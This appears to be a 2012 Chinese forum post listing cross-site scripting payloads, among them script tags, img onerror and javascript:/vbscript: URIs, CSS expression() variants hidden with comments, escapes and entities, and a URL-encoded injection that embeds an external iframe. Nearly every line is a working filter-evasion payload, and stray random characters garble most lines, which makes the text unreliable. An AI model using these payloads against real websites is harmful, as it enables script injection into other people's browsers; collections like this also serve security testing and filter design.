<script>alert("跨站")</script> (最常用); J' a/ \7 _$ ?) |2 r9 E( h
<img scr=javascript:alert("跨站")></img>2 q q) O, v. ?. ?2 }0 V- S
<img scr="javascript: alert(/跨站/)></img>9 g Y6 A3 ~/ _5 g
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)$ q) ?( T4 l; h" D- [& F
<img scr="#" onerror=alert(/跨站/)></img>' B0 ?6 _& U' @
<img scr="#" style="xss:expression(alert(/xss/));"></img>
* U8 L3 B* t+ o<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)- {* X* C! ?4 T
<img src=vbscript:msgbox ("xss")></img>
# P$ h9 I9 b4 F. t+ m<style> input {left:expression (alert('xss'))}</style>
" D: } k' m! b$ c( l) i2 }<div style={left:expression (alert('xss'))}></div>5 s8 d$ X( J& ~$ V* ]
<div style={left:exp/* */ression (alert('xss'))}></div>. a+ b# H! w1 P) Y
<div style={left:\0065\0078ression (alert('xss'))}></div>5 P3 Z, _4 g8 O, q5 ]4 W& T
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
, a9 c1 x) Q% Ounicode <div style="{left:expRessioN (alert('xss'))}">
5 L+ H8 A. `* N0 N
- @- K' E. b* ?1 p' x0 x! b"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["$ H) z% R6 b5 a1 Z: `" v* z$ K
|
发表于 2012-9-13 17:15:04
收藏
支持
反对